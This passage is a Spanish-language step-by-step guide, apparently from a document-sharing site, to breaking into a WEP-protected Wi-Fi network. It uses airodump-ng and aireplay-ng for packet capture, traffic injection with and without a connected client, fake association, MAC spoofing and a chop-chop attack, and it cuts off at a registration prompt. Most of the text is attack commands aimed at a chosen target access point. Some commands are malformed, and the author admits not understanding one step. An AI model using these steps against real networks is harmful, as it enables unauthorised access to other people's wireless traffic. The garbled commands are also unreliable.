Ninguno
Los 5 primeros pasos serian comunes para las opciones 1 y 2
1º) ifconfig eth0 up
2º) airodump eth0 pruebas 0 1
Veo las conexiones y apunto los datos delobjetivo, como BSSID , ESSID y el canal.
Una vez apuntado los datos necesarios del ap, del cliente , etc, cerramos el proceso con CONTROL+Z
3º ) iwconfig “interface” rate 1M
limitamos el ratede nuestra tarjeta a 1 Mb por segundo.
En interface ponemos rtap0 para ipw2200.
Hay veces que no se podra.
4º) iwconfig eth0 essid "ap_objetivo" key 1234567890123 channel “canal”
Este seriael ataque 1.
Me vinculo al ap con una key falsa
“ap objetivo”--> nombre de la conexión objetivo “paco”, “WLAN”, etc…
“canal”--> indicar el canal
Puede haber veces que no nos deje.
5º)airodump-ng -c canal -b bssid -w archivo rtap0
Lo ejecuto en otra ventana y empiezo a capturar datos indicando el canal y la mac del objetivo
"canal"--> se sustituye por el canal"Bssid"-->se sustituye por la mac del objetivo
Archivo --> nombre del archivo donde se guardan las capturas de datos
OPCION 1: CON CLIENTE CONECTADO (ataque 3)
6º) aireplay-ng --ipwsys -3 -x 1024-g 1000000 -b bssid -h cliente -i rtap0 eth0
Inyecto trafico con el metodo de rh3nt0n. Con un cliente conectado.
Este no se muy bien lo que hace, si captura paquetes del cliente y los manda alap.
Bssid-->se sustituye por la mac del objetivo
Cliente--> se sustituye por la mac del cliente conectado a la web
OPCION 2:SIN CLIENTE CONECTADO (ataque 2)
cliente falso
6º)aireplay-ng - - ipwsys -2 –t 1 –b bssid –c FF:FF:FF:FF:FF:FF –i rtap0 eth0
Se agradeceria algo de información.
ATAQUE CHOP CHOP: sin cliente conectado
--> ifconfig eth0 up hw ether00:11:22:33:44:55
Con esto activamos la tarjeta y cambiamos la mac a 00:11:22:33:44:55
--> iwconfig eth0 essid “nombre del AP ” channel “canal” key 12345
Asi nos ponemos el nombre del AP y una clave...
Regístrate para leer el documento completo.